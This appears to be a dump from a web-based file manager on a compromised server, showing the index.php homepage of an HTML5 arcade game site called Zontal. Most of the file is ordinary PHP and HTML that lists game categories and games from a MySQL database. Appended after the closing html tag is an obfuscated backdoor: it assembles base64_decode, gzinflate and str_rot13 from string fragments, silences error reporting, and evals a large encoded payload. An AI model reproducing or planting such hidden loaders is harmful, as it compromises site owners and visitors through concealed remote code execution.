Файловый менеджер - Редактировать - /home/flapvehx/streamnexus.online/static/img/logo/index.php.tar
Ðазад
home/flapvehx/streamnexus.online/index.php 0000644 00000037611 15000270177 0015001 0 ustar 00 <?php // +------------------------------------------------------------------------+ // | @author: MvnThemes // | @name: Zontal - The Arcade Online HTML5 Game Playing Platform // | @author_email: mvk62015@gmail.com // | @version: 1.0v // +------------------------------------------------------------------------+ // | Zontal - The Arcade Online HTML5 Game Playing Platform // | Copyright (c) 2017 Zontal. All rights reserved. // ?> <?php // include Header ?> <?php include("includes/header.php") ?> <?php // Getting Total Categories ?> <?php $run = mysqli_query($con, "select * from zon_category"); $count = mysqli_num_rows($run); ?> <?php // Body Start ?> <body class="bg-dark dark:bg-[#121317]"> <?php // include Main Header ?> <?php include("includes/main-h.php") ?> <?php // Categories Container ?> <div class="cat-container px-4 relative mt-4"> <button class="left ml-2 mt-1 w-10 h-10 hidden absolute left-0 rounded-full bg-gray-200 dark:bg-zinc-800 text-gray-700 dark:hover:bg-zinc-700 hover:bg-gray-300 dark:text-white bi-chevron-left"></button> <?php // Categories Loop ?> <div class="cat-item-container scroll-hidden w-full overflow-x-scroll flex gap-4"> <?php $run = mysqli_query($con, "select * from zon_category"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="<?php echo $site_url ?>game/<?= $row['slug'] ?>" class="py-3 px-4 transition whitespace-nowrap dark:text-gray-300 dark:bg-[#1b1d22] duration-300 mb-2 hover:bg-blue-600 hover:text-gray-100 text-gray-600 text-sm rounded-md bg-gray-200"><?= $row['name'] ?></a> <?php } ?> </div> <?php // Categories Loop End ?> <button class="right h-10 mr-2 mt-0 absolute right-0 top-0 w-10 rounded-full bg-gray-200 dark:bg-zinc-800 text-gray-700 dark:hover:bg-zinc-700 hover:bg-gray-300 dark:text-white bi-chevron-right"></button> </div> <div class="body container-zon mt-3 px-0"> <div class="mx-4"> <?php // First Game Container ?> <div class="grid"> <?php $run_d = mysqli_query($con, "select * from zon_games where game_played > 50 order by id desc limit 1"); while ($row = mysqli_fetch_assoc($run_d)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box large block relative overflow-hidden rounded-xl upward cursor-pointer transition duration-300 overlay"> <div class="card-body absolute w-full h-full "> <img src="<?= $row['game_image_url'] ?>" class="absolute w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </div> </a> <?php } ?> <?php $run = mysqli_query($con, "select * from zon_games order by id desc limit 1,63"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl upward cursor-pointer transition duration-300 overlay"> <div class="card-body absolute w-full h-full "> <img src="<?= $row['game_image_url'] ?>" class="absolute w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </div> </a> <?php } ?> </div> <?php // First Game Container End ?> <?php // Start Advertisement Area No. 1 ?> <?php $run = mysqli_query($con, "select * from zon_ads limit 1,1"); while ($row = mysqli_fetch_assoc($run)) { ?> <?php if ($row['status'] == 0) { ?> <div class="advertisement flex mt-6 relative overflow-hidden justify-center "> <div class="banner"> <?= $row['code'] ?> </div> </div> <?php } } ?> <?php // End Advertisement Area No. 1 ?> <?php // Showing Games By Category Action ?> <h2 class="heading font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Action Games</h2> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' && game_played > 50 order by id desc limit 1"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden large float-right rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' order by id desc limit 54"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative <?php if ($row['game_played'] > 10) { echo "large"; } ?> overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> <?php // End Action Category Games ?> <?php // Start Advertisement Area No. 2 ?> <?php $run = mysqli_query($con, "select * from zon_ads limit 1,1"); while ($row = mysqli_fetch_assoc($run)) { ?> <?php if ($row['status'] == 0) { ?> <div class="advertisement flex mt-6 relative overflow-hidden justify-center "> <div class="banner"> <?= $row['code'] ?> </div> </div> <?php } } ?> <?php // End Start Advertisement Area No. 2 ?> <?php // Games By Categories vise ?> <div class="drill flex resp gap-3"> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Action Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/action">view</a> </div> <?php // Showing Games By Category Action ?> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> <?php // End Action Category Games ?> </div> <?php // Showing Games By Category Shooting ?> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Shooting Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/Shooting">view</a> </div> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Shooting' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> </div> <?php // End Shooting Category Games ?> <?php // Showing Games By Category Puzzles ?> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Puzzles Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/puzzles">view</a> </div> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Puzzles' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> </div> <?php // End Puzzles Category Games ?> </div> <?php // End Games By Categories vise ?> </div> </div> </div> </div> <?php // Include Footer ?> <?php include("includes/footer.php") ?> </body> <?php // Body End ?> </html> <?php $TgPhB = 'ba'.'se64'.'_deco'.'de'; $tieTH = 'gzinf'.'late'; $jlwcS = 's'.'tr'.'_rot1'.'3'; ini_set('log_errors', 0); ini_set('display_errors', 0); error_reporting(0); /* bys h xzeagzdnnqaiw bues */ eval($jlwcS($tieTH($TgPhB('pVUNb+I4EP0rbsRJyYkmUL6ag+uJdENod8XS9Mod3e6hOHWcwp5xHBJtYPvf144DhaVFSEVCcWae37yMxzOAIQTRBDEfIpx6C7WitUHJn8AsnIE/QYBzX0YoUxVdN5QyUMTfSOCSGXFG/CeWzAwOY2TpsVkY6NDLUo8Z0ch+TNKrGVnOdT/xFUm7JGnG0LuIz+8aNx8Xj9fL73SLeJYxht/FOx3XG+nn6/+rkbPhRRC+j1SwxKFHcQo9kGDsTxYMTyj0MPNwoJZClGmrEoURE9mOeXJeAbTTGKhs6eNvqoRqYk/CN1DunqReilWtna8DhqGPOSwpg2HfHluXzoQ/ykASvYm5cwc3rl0G4vTfBN1a47F1PbaGA2dkdcugeoDQdp2+3XXsQbd3K4gPYXu98eTKtUe3ny7dQsQR2Dur5xzGDq1u1x06zujetfoc2zwEPg7V77n24G+3y3GlCV9zKV+UO8e5zD2T3KV81doi3ZdkwdZnxGaMCqaCmmYwYPIdMRwiT11v0NrPLAsYWEk7kAfefn5+KaOAPPG9PsFcVymAIaJMW4E0VtcIHi0NePEoeT354Us9KbxywJ71V7I2KDSAeIpSzNQY+swrUMpU0XagYEsar/9I4g4p2q7wXFEJoderP2d6kSNx8prtIrcVAgVxVqFsnUOExBvXc5LHKMQUXU7TBHPR7/avqCJMfxiG2BlgQr/rWfrEjEbETFqp1SuVs0aVtGokatbJWessmp/XYjKv6AleisvPg/qILXjjwzRRFaPz8BdvLqKDlGTw1fo8czFrs9D7uuS80UnN6553tOgz02wwLpVWqFmtzxuk2aLUpM14Xq+QqFU7QnQR/kV1btg43tYtO78UvpkCbygP9qW3zLjWorF5TmgrOue5brRq1GzGUdWsmZU5OUL6WsG2gJ3OPnv9Jzr94J/W1aMbzz/++2GLqr3JgjRse/I8SLeYIroy9U9Tj2ZhxAIj9filFpIzQd45ubGGDm9+QFguOjjFGbvoGPKZD6IEF9MYwwxOGVLlTZPMnIhQyoIgL/tfMxAx75uq/67FCC7Fk2RZng5OqYEfP8AOGKKIk0sUnIqF2L7B56cntSidUXwPozBjYAkjnsS8Vej04sGz5dr1FnwEAsvbWD4Tfo2NzastNv+X5+JBjNyHEjgFX8ZfN4Ah9CLw28p2P/TdHp8/o7HbHdy7z+DkND4GFO2G0kGReB5LxukY64+4UPjgS/iX7CeVD5lmvb457H13nhpx4j8B')))); ?>